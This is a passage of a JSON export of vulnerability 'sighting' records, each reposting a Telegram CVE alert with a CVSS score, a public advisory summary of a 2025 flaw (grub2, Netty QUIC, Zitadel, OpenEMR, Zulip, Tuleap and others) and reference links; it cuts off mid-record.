"https://t.me/DarkWebInformer_CVEAlerts/9752", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-29908\n\ud83d\udd25 CVSS Score: 5.3 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L)\n\ud83d\udd39 Description: Netty QUIC codec is a QUIC codec for netty which makes use of quiche. An issue was discovered in the codec. A hash collision vulnerability (in the hash map used to manage connections) allows remote attackers to cause a considerable CPU load on the server (a Hash DoS attack) by initiating connections with colliding Source Connection IDs (SCIDs). This vulnerability is fixed in 0.0.71.Final.\n\ud83d\udccf Published: 2025-03-31T18:43:44.172Z\n\ud83d\udccf Modified: 2025-03-31T18:43:44.172Z\n\ud83d\udd17 References:\n1. https://github.com/netty/netty-incubator-codec-quic/security/advisories/GHSA-hqqc-jr88-p6x2\n2. https://github.com/netty/netty-incubator-codec-quic/commit/e059bd9b78723f8b035e0c547e42ce263f03461c\n3. https://github.com/ncc-pbottine/QUIC-Hash-Dos-Advisory", "creation_timestamp": "2025-03-31T19:31:17.000000Z"}, {"uuid": "c05179be-bee1-4c35-9c1f-f8f853ab5f9d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5VMP-M5V2-HX47", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/9231", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-2885\n\ud83d\udd25 CVSS Score: 5.7 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:H/AT:N/PR:H/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N)\n\ud83d\udd39 Description: When updating the root role, a TUF client must establish a trusted line of continuity to the latest set of keys. While sequentially downloading new versions of the root metadata file, tough will not check that the root object version it received was the next sequential version from the previously trusted root metadata. As a result, tough could trust content associated with a previous root role. The tough client will trust an unexpected root role in the event that an actor with control of the storage medium of a trusted TUF repository inappropriately replaced the contents of one of the root metadata files with an adequately signed previous version. As a result, tough could trust content associated with a previous root role.\n\ud83d\udccf Published: 2025-03-27T22:18:11.727Z\n\ud83d\udccf Modified: 2025-03-27T22:18:11.727Z\n\ud83d\udd17 References:\n1. https://github.com/awslabs/tough/security/advisories/GHSA-5vmp-m5v2-hx47\n2. https://aws.amazon.com/security/security-bulletins/AWS-2025-007/", "creation_timestamp": "2025-03-27T22:36:39.000000Z"}, {"uuid": "937b3319-8b96-43a0-8b91-e6365c732036", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2655", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/9234", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-0624\n\ud83d\udd25 CVSS Score: 7.6 (cvssV3_1, Vector: CVSS:3.1/AV:A/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: A flaw was found in grub2. During the network boot process, when trying to search for the configuration file, grub copies data from a user controlled environment variable into an internal buffer using the grub_strcpy() function. During this step, it fails to consider the environment variable length when allocating the internal buffer, resulting in an out-of-bounds write. If correctly exploited, this issue may result in remote code execution through the same network segment grub is searching for the boot information, which can be used to by-pass secure boot protections.\n\ud83d\udccf Published: 2025-02-19T18:23:21.463Z\n\ud83d\udccf Modified: 2025-03-27T22:08:46.706Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:2521\n2. https://access.redhat.com/errata/RHSA-2025:2653\n3. https://access.redhat.com/errata/RHSA-2025:2655\n4. https://access.redhat.com/errata/RHSA-2025:2675\n5. https://access.redhat.com/errata/RHSA-2025:2784\n6. https://access.redhat.com/errata/RHSA-2025:2799\n7. https://access.redhat.com/errata/RHSA-2025:2867\n8. https://access.redhat.com/errata/RHSA-2025:2869\n9. https://access.redhat.com/errata/RHSA-2025:3367\n10. https://access.redhat.com/security/cve/CVE-2025-0624\n11. https://bugzilla.redhat.com/show_bug.cgi?id=2346112", "creation_timestamp": "2025-03-27T22:36:42.000000Z"}, {"uuid": "99b99e60-2246-4e91-92d3-4b24afa2f46a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-GFH6-3PQW-X2J4", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/9318", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-2240\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A flaw was found in Smallrye, where smallrye-fault-tolerance is vulnerable to an out-of-memory (OOM) issue. This vulnerability is externally triggered when calling the metrics URI. Every call creates a new object within meterMap and may lead to a denial of service (DoS) issue.\n\ud83d\udccf Published: 2025-03-12T14:55:15.889Z\n\ud83d\udccf Modified: 2025-03-28T10:32:34.112Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/security/cve/CVE-2025-2240\n2. https://bugzilla.redhat.com/show_bug.cgi?id=2351452\n3. https://github.com/advisories/GHSA-gfh6-3pqw-x2j4", "creation_timestamp": "2025-03-28T11:28:34.000000Z"}, {"uuid": "e6db266b-1f69-40d6-b196-0bfda5cc2c88", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2521", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/9234", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-0624\n\ud83d\udd25 CVSS Score: 7.6 (cvssV3_1, Vector: CVSS:3.1/AV:A/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: A flaw was found in grub2. During the network boot process, when trying to search for the configuration file, grub copies data from a user controlled environment variable into an internal buffer using the grub_strcpy() function. During this step, it fails to consider the environment variable length when allocating the internal buffer, resulting in an out-of-bounds write. If correctly exploited, this issue may result in remote code execution through the same network segment grub is searching for the boot information, which can be used to by-pass secure boot protections.\n\ud83d\udccf Published: 2025-02-19T18:23:21.463Z\n\ud83d\udccf Modified: 2025-03-27T22:08:46.706Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:2521\n2. https://access.redhat.com/errata/RHSA-2025:2653\n3. https://access.redhat.com/errata/RHSA-2025:2655\n4. https://access.redhat.com/errata/RHSA-2025:2675\n5. https://access.redhat.com/errata/RHSA-2025:2784\n6. https://access.redhat.com/errata/RHSA-2025:2799\n7. https://access.redhat.com/errata/RHSA-2025:2867\n8. https://access.redhat.com/errata/RHSA-2025:2869\n9. https://access.redhat.com/errata/RHSA-2025:3367\n10. https://access.redhat.com/security/cve/CVE-2025-0624\n11. https://bugzilla.redhat.com/show_bug.cgi?id=2346112", "creation_timestamp": "2025-03-27T22:36:42.000000Z"}, {"uuid": "21f123ff-9056-46ad-9e2d-047960304937", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2784", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/9234", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-0624\n\ud83d\udd25 CVSS Score: 7.6 (cvssV3_1, Vector: CVSS:3.1/AV:A/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: A flaw was found in grub2. During the network boot process, when trying to search for the configuration file, grub copies data from a user controlled environment variable into an internal buffer using the grub_strcpy() function. During this step, it fails to consider the environment variable length when allocating the internal buffer, resulting in an out-of-bounds write. If correctly exploited, this issue may result in remote code execution through the same network segment grub is searching for the boot information, which can be used to by-pass secure boot protections.\n\ud83d\udccf Published: 2025-02-19T18:23:21.463Z\n\ud83d\udccf Modified: 2025-03-27T22:08:46.706Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:2521\n2. https://access.redhat.com/errata/RHSA-2025:2653\n3. https://access.redhat.com/errata/RHSA-2025:2655\n4. https://access.redhat.com/errata/RHSA-2025:2675\n5. https://access.redhat.com/errata/RHSA-2025:2784\n6. https://access.redhat.com/errata/RHSA-2025:2799\n7. https://access.redhat.com/errata/RHSA-2025:2867\n8. https://access.redhat.com/errata/RHSA-2025:2869\n9. https://access.redhat.com/errata/RHSA-2025:3367\n10. https://access.redhat.com/security/cve/CVE-2025-0624\n11. https://bugzilla.redhat.com/show_bug.cgi?id=2346112", "creation_timestamp": "2025-03-27T22:36:42.000000Z"}, {"uuid": "38c94bab-79c8-4d6a-815f-a8ba80db92e1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2869", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/9234", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-0624\n\ud83d\udd25 CVSS Score: 7.6 (cvssV3_1, Vector: CVSS:3.1/AV:A/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: A flaw was found in grub2. During the network boot process, when trying to search for the configuration file, grub copies data from a user controlled environment variable into an internal buffer using the grub_strcpy() function. During this step, it fails to consider the environment variable length when allocating the internal buffer, resulting in an out-of-bounds write. If correctly exploited, this issue may result in remote code execution through the same network segment grub is searching for the boot information, which can be used to by-pass secure boot protections.\n\ud83d\udccf Published: 2025-02-19T18:23:21.463Z\n\ud83d\udccf Modified: 2025-03-27T22:08:46.706Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:2521\n2. https://access.redhat.com/errata/RHSA-2025:2653\n3. https://access.redhat.com/errata/RHSA-2025:2655\n4. https://access.redhat.com/errata/RHSA-2025:2675\n5. https://access.redhat.com/errata/RHSA-2025:2784\n6. https://access.redhat.com/errata/RHSA-2025:2799\n7. https://access.redhat.com/errata/RHSA-2025:2867\n8. https://access.redhat.com/errata/RHSA-2025:2869\n9. https://access.redhat.com/errata/RHSA-2025:3367\n10. https://access.redhat.com/security/cve/CVE-2025-0624\n11. https://bugzilla.redhat.com/show_bug.cgi?id=2346112", "creation_timestamp": "2025-03-27T22:36:42.000000Z"}, {"uuid": "ce81906a-2423-4b52-8cec-9f55b4e86ab4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2799", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/9234", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-0624\n\ud83d\udd25 CVSS Score: 7.6 (cvssV3_1, Vector: CVSS:3.1/AV:A/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: A flaw was found in grub2. During the network boot process, when trying to search for the configuration file, grub copies data from a user controlled environment variable into an internal buffer using the grub_strcpy() function. During this step, it fails to consider the environment variable length when allocating the internal buffer, resulting in an out-of-bounds write. If correctly exploited, this issue may result in remote code execution through the same network segment grub is searching for the boot information, which can be used to by-pass secure boot protections.\n\ud83d\udccf Published: 2025-02-19T18:23:21.463Z\n\ud83d\udccf Modified: 2025-03-27T22:08:46.706Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:2521\n2. https://access.redhat.com/errata/RHSA-2025:2653\n3. https://access.redhat.com/errata/RHSA-2025:2655\n4. https://access.redhat.com/errata/RHSA-2025:2675\n5. https://access.redhat.com/errata/RHSA-2025:2784\n6. https://access.redhat.com/errata/RHSA-2025:2799\n7. https://access.redhat.com/errata/RHSA-2025:2867\n8. https://access.redhat.com/errata/RHSA-2025:2869\n9. https://access.redhat.com/errata/RHSA-2025:3367\n10. https://access.redhat.com/security/cve/CVE-2025-0624\n11. https://bugzilla.redhat.com/show_bug.cgi?id=2346112", "creation_timestamp": "2025-03-27T22:36:42.000000Z"}, {"uuid": "9f06b228-00cd-4845-a7d7-e4f16899541c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-PCMH-G36C-QC44", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/9546", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-1734\n\ud83d\udd25 CVSS Score: 6.3 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N)\n\ud83d\udd39 Description: In PHP from 8.1.* before 8.1.32, from 8.2.* before 8.2.28, from 8.3.* before 8.3.19, from 8.4.* before 8.4.5, when receiving headers from HTTP server, the headers missing a colon (:) are treated as valid headers even though they are not. This may confuse applications into accepting invalid headers.\n\ud83d\udccf Published: 2025-03-30T05:43:35.771Z\n\ud83d\udccf Modified: 2025-03-30T05:43:35.771Z\n\ud83d\udd17 References:\n1. https://github.com/php/php-src/security/advisories/GHSA-pcmh-g36c-qc44", "creation_timestamp": "2025-03-30T06:32:02.000000Z"}, {"uuid": "bd3d6239-f8f2-4cb4-adeb-e547da351d55", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4389-RWQF-Q9GQ", "type": "published-proof-of-concept", "source": "Telegram/ylcODQd3Ghk_u3NxDdtmMfOkVOn_WhDQ3Q3s4y1swSp7-7I", "content": "", "creation_timestamp": "2026-01-10T00:04:56.000000Z"}, {"uuid": "a2a04cce-9207-46ab-86c0-f4d3325ea933", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-H3Q7-347G-QWHF", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/9764", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-31123\n\ud83d\udd25 CVSS Score: 8.7 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N)\n\ud83d\udd39 Description: Zitadel is open-source identity infrastructure software. A vulnerability existed where expired keys can be used to retrieve tokens. Specifically, ZITADEL fails to properly check the expiration date of the JWT key when used for Authorization Grants. This allows an attacker with an expired key to obtain valid access tokens. This vulnerability does not affect the use of JWT Profile for OAuth 2.0 Client Authentication on the Token and Introspection endpoints, which correctly reject expired keys. This vulnerability is fixed in 2.71.6, 2.70.8, 2.69.9, 2.68.9, 2.67.13, 2.66.16, 2.65.7, 2.64.6, and 2.63.9.\n\ud83d\udccf Published: 2025-03-31T19:31:40.507Z\n\ud83d\udccf Modified: 2025-03-31T19:31:40.507Z\n\ud83d\udd17 References:\n1. https://github.com/zitadel/zitadel/security/advisories/GHSA-h3q7-347g-qwhf\n2. https://github.com/zitadel/zitadel/commit/315503beabd679f2e6aec0c004f0f9d2f5b53ed3\n3. https://github.com/zitadel/zitadel/releases/tag/v2.63.9\n4. https://github.com/zitadel/zitadel/releases/tag/v2.64.6\n5. https://github.com/zitadel/zitadel/releases/tag/v2.65.7\n6. https://github.com/zitadel/zitadel/releases/tag/v2.66.16\n7. https://github.com/zitadel/zitadel/releases/tag/v2.67.13\n8. https://github.com/zitadel/zitadel/releases/tag/v2.68.9\n9. https://github.com/zitadel/zitadel/releases/tag/v2.69.9\n10. https://github.com/zitadel/zitadel/releases/tag/v2.70.8\n11. https://github.com/zitadel/zitadel/releases/tag/v2.71.6", "creation_timestamp": "2025-03-31T20:31:10.000000Z"}, {"uuid": "678aaded-1c40-41f4-8caf-b37f41c4cfa4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-QWJ6-Q94F-8425", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/10007", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-29049\n\ud83d\udd25 CVSS Score: N/A\n\ud83d\udd39 Description: Cross Site Scripting vulnerability in arnog MathLive Versions v0.103.0 and before (fixed in 0.104.0) allows an attacker to execute arbitrary code via the MathLive function.\n\ud83d\udccf Published: 2025-04-01T00:00:00.000Z\n\ud83d\udccf Modified: 2025-04-01T20:13:35.205Z\n\ud83d\udd17 References:\n1. https://github.com/advisories/GHSA-qwj6-q94f-8425\n2. https://github.com/arnog/mathlive/commit/abc26056fd5e29a99edfa96a0bbe855ea2a8b678", "creation_timestamp": "2025-04-01T20:33:28.000000Z"}, {"uuid": "972dbcae-9b32-4948-80c2-092083650645", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-W6C3-PXVR-6M6J", "type": "published-proof-of-concept", "source": "Telegram/ylcODQd3Ghk_u3NxDdtmMfOkVOn_WhDQ3Q3s4y1swSp7-7I", "content": "", "creation_timestamp": "2026-01-10T00:04:56.000000Z"}, {"uuid": "701c335e-02c2-4138-ac3f-e18198aa2ee1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7CH6-2PMG-M853", "type": "published-proof-of-concept", "source": "Telegram/rdcJ-eVVBzDoFwL5TR2qJvsWI6XIYotV57lHh9Pxh3U8ZQE", "content": "", "creation_timestamp": "2026-01-10T02:04:07.000000Z"}, {"uuid": "ff788dc4-575f-4580-b608-3b38a6b1223a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9X7J-GX23-7M5R", "type": "published-proof-of-concept", "source": "Telegram/rdcJ-eVVBzDoFwL5TR2qJvsWI6XIYotV57lHh9Pxh3U8ZQE", "content": "", "creation_timestamp": "2026-01-10T02:04:07.000000Z"}, {"uuid": "3539b7d3-37c7-4b55-9aaa-499509837e4a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4G6V-36FV-QCVW", "type": "published-proof-of-concept", "source": "Telegram/rdcJ-eVVBzDoFwL5TR2qJvsWI6XIYotV57lHh9Pxh3U8ZQE", "content": "", "creation_timestamp": "2026-01-10T02:04:07.000000Z"}, {"uuid": "20462d4b-5207-4709-8384-0f278ee62b31", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8W3H-Q8JM-3CHQ", "type": "published-proof-of-concept", "source": "Telegram/rdcJ-eVVBzDoFwL5TR2qJvsWI6XIYotV57lHh9Pxh3U8ZQE", "content": "", "creation_timestamp": "2026-01-10T02:04:07.000000Z"}, {"uuid": "db547391-09e9-4c49-b257-44bf502c401b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-R3WG-G8XV-GXVF", "type": "published-proof-of-concept", "source": "Telegram/rdcJ-eVVBzDoFwL5TR2qJvsWI6XIYotV57lHh9Pxh3U8ZQE", "content": "", "creation_timestamp": "2026-01-10T02:04:07.000000Z"}, {"uuid": "70640518-bdc8-4a45-ba5e-4210ca947be2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-MMG3-567W-V9J2", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/9704", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-31122\n\ud83d\udd25 CVSS Score: 9 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H)\n\ud83d\udd39 Description: scratch-coding-hut.github.io is the website for Coding Hut. In 1.0-beta3 and earlier, the login link can be used to login to any account by changing the username in the username field.\n\ud83d\udccf Published: 2025-03-31T16:58:19.115Z\n\ud83d\udccf Modified: 2025-03-31T16:58:19.115Z\n\ud83d\udd17 References:\n1. https://github.com/Scratch-Coding-Hut/Scratch-Coding-Hut/security/advisories/GHSA-mmg3-567w-v9j2\n2. https://github.com/Scratch-Coding-Hut/Scratch-Coding-Hut.github.io/issues/56", "creation_timestamp": "2025-03-31T17:30:51.000000Z"}, {"uuid": "d0ea968c-8198-4357-b2da-7eb8d3a3f44e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-QJX3-83JH-2JC4", "type": "published-proof-of-concept", "source": "Telegram/kc5WHXHA21xGrYy-vKhrM6Lt6BytfnBaL2__FXkd6uwb31g", "content": "", "creation_timestamp": "2026-01-10T02:04:17.000000Z"}, {"uuid": "d0205963-f011-48de-a0c2-82bad84868d2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-H74X-VWWR-MM5G", "type": "published-proof-of-concept", "source": "Telegram/kc5WHXHA21xGrYy-vKhrM6Lt6BytfnBaL2__FXkd6uwb31g", "content": "", "creation_timestamp": "2026-01-10T02:04:17.000000Z"}, {"uuid": "304284cc-08aa-4ed6-9023-dbbdb65c7a61", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-W9CM-Q69W-34X7", "type": "published-proof-of-concept", "source": "Telegram/kc5WHXHA21xGrYy-vKhrM6Lt6BytfnBaL2__FXkd6uwb31g", "content": "", "creation_timestamp": "2026-01-10T02:04:17.000000Z"}, {"uuid": "1da88d5d-c94d-4402-814f-9b624bea95da", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FWFV-8583-6RR7", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/9696", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-30149\n\ud83d\udd25 CVSS Score: 6.4 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:N)\n\ud83d\udd39 Description: OpenEMR is a free and open source electronic health records and medical practice management application. OpenEMR allows reflected cross-site scripting (XSS) in the AJAX Script interface\\super\\layout_listitems_ajax.php via the target parameter. This vulnerability is fixed in 7.0.3.\n\ud83d\udccf Published: 2025-03-31T16:07:11.417Z\n\ud83d\udccf Modified: 2025-03-31T16:07:11.417Z\n\ud83d\udd17 References:\n1. https://github.com/openemr/openemr/security/advisories/GHSA-fwfv-8583-6rr7\n2. https://github.com/openemr/openemr/commit/6cb70595f65decfbdd03e70b49acc414e03744b8", "creation_timestamp": "2025-03-31T16:33:20.000000Z"}, {"uuid": "0595a5ee-e8e5-44c6-9fad-2521cf827ca2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-358P-X39M-99MM", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/9757", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-27149\n\ud83d\udd25 CVSS Score: 4.6 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N)\n\ud83d\udd39 Description: Zulip server provides an open-source team chat that helps teams stay productive and focused. Prior to 10.0, the data export to organization administrators feature in Zulip leaks private data. The collection of user-agent types identifying specific integrations or HTTP libraries (E.g., ZulipGitlabWebhook, okhttp, or PycURL) that have been used to access any organization on the server was incorrectly included in all three export types, regardless of if they were used to access the exported organization or not. The \"public data\" and \"with consent\" exports metadata including the titles of some topics in private channels which the administrator otherwise did not have access to, and none of the users consented to exporting and metadata for which users were in a group DM together. This vulnerability is fixed in 10.0.\n\ud83d\udccf Published: 2025-03-31T15:33:38.543Z\n\ud83d\udccf Modified: 2025-03-31T18:36:58.695Z\n\ud83d\udd17 References:\n1. https://github.com/zulip/zulip/security/advisories/GHSA-358p-x39m-99mm", "creation_timestamp": "2025-03-31T19:31:24.000000Z"}, {"uuid": "5827eb8f-bf82-4889-8178-4097fbe6b463", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HQQR-P5F6-26VV", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/9760", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-29929\n\ud83d\udd25 CVSS Score: 4.6 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:L)\n\ud83d\udd39 Description: Tuleap is an Open Source Suite to improve management of software developments and collaboration. Tuleap is missing CSRF protection on tracker hierarchy administration. An attacker could use this vulnerability to trick victims into submitting or editing artifacts or follow-up comments. This vulnerability is fixed in Tuleap Community Edition 16.5.99.1742306712 and Tuleap Enterprise Edition 16.5-5 and 16.4-8.\n\ud83d\udccf Published: 2025-03-31T15:40:58.925Z\n\ud83d\udccf Modified: 2025-03-31T18:35:27.933Z\n\ud83d\udd17 References:\n1. https://github.com/Enalean/tuleap/security/advisories/GHSA-hqqr-p5f6-26vv\n2. https://github.com/Enalean/tuleap/commit/dce61747f3a169da1f6b585ad5e6e0847fa3c950\n3. https://tuleap.net/plugins/git/tuleap/tuleap/stable?a=commit&amp;h=dce61747f3a169da1f6b585ad5e6e0847fa3c950\n4. https://tuleap.net/plugins/tracker/?aid=42231", "creation_timestamp": "2025-03-31T19:31:27.000000Z"}, {"uuid": "66e84802-6b4a-4dad-8927-5033182158ca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-67M4-8G4W-633Q", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/9763", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-31124\n\ud83d\udd25 CVSS Score: 5.3 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)\n\ud83d\udd39 Description: Zitadel is open-source identity infrastructure software. ZITADEL administrators can enable a setting called \"Ignoring unknown usernames\" which helps mitigate attacks that try to guess/enumerate usernames. If enabled, ZITADEL will show the password prompt even if the user doesn't exist and report \"Username or Password invalid\". While the setting was correctly respected during the login flow, the user's username was normalized leading to a disclosure of the user's existence. This vulnerability is fixed in 2.71.6, 2.70.8, 2.69.9, 2.68.9, 2.67.13, 2.66.16, 2.65.7, 2.64.6, and 2.63.9.\n\ud83d\udccf Published: 2025-03-31T19:38:12.235Z\n\ud83d\udccf Modified: 2025-03-31T19:38:12.235Z\n\ud83d\udd17 References:\n1. https://github.com/zitadel/zitadel/security/advisories/GHSA-67m4-8g4w-633q\n2. https://github.com/zitadel/zitadel/commit/14de8ecac2afafee4975ed7ac26f3ca4a2b0f82c\n3. https://github.com/zitadel/zitadel/releases/tag/v2.63.9\n4. https://github.com/zitadel/zitadel/releases/tag/v2.64.6\n5. https://github.com/zitadel/zitadel/releases/tag/v2.65.7\n6. https://github.com/zitadel/zitadel/releases/tag/v2.66.16\n7. https://github.com/zitadel/zitadel/releases/tag/v2.67.13\n8. https://github.com/zitadel/zitadel/releases/tag/v2.68.9\n9. https://github.com/zitadel/zitadel/releases/tag/v2.69.9\n10. https://github.com/zitadel/zitadel/releases/tag/v2.70.8\n11. https://github.com/zitadel/zitadel/releases/tag/v2.71.6", "creation_timestamp": "2025-03-31T20:31:09.000000Z"}, {"uuid": "c8e31292-790e-4bcf-89ca-079defe8d075", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:3297", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/10194", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: 